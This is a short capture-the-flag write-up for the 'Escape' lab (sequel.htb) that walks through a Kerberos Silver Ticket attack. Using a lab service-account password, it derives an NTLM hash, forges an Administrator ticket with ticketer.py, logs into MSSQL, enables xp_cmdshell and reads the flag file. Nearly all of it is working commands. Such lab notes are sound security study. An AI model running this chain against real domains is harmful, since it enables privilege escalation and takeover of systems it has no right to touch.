CTF: Silver Ticket - Privilege Escalation

Attack Scenario

You have a SQL service account and password. You want to access to the SQL with Administrator Service Ticket, so that you can run xp_cmdshell command to escalate the privilege to SYSTEM.


# Service Account: svc_sql
# Password: REGGIE1234ronnie 

# Create a NTLM hash from a password
iptracej@kali ~/h/Escape> python3
>>> import hashlib
>>> hashlib.new('md4', 'REGGIE1234ronnie '.encode('utf-16le')).digest().hex()

# Get Domain SID
getPac.py sequel.htb/sql_svc:REGGIE1234ronnie -targetUser Administrator
sudo ntpdate -u sequel.htb

# Domain SID: S-1-5-21-4078382237-1492182817-2568127209

# Create a Silver Ticket 
# We fake a SPN set to this 
ticketer.py -nthash 1443ec19da4dac4ffc953bca1b57b4cf -domain-sid S-1-5-21-4078382237-1492182817-2568127209 -domain sequel.htb -spn Hahahah/dc.sequel.htb Administrator

# Access to MSSQL 
KRB5CCNAME=Administrator.ccache mssqlclient.py -k administrator@dc.sequel.htb

SQL> enable_xp_cmdshell
SQL> xp_cmdshell whoami
SQL> select x from OpenRowset(BULK 'C:\Users\Administrator\Desktop\root.txt',SINGLE_CLOB) R(x)

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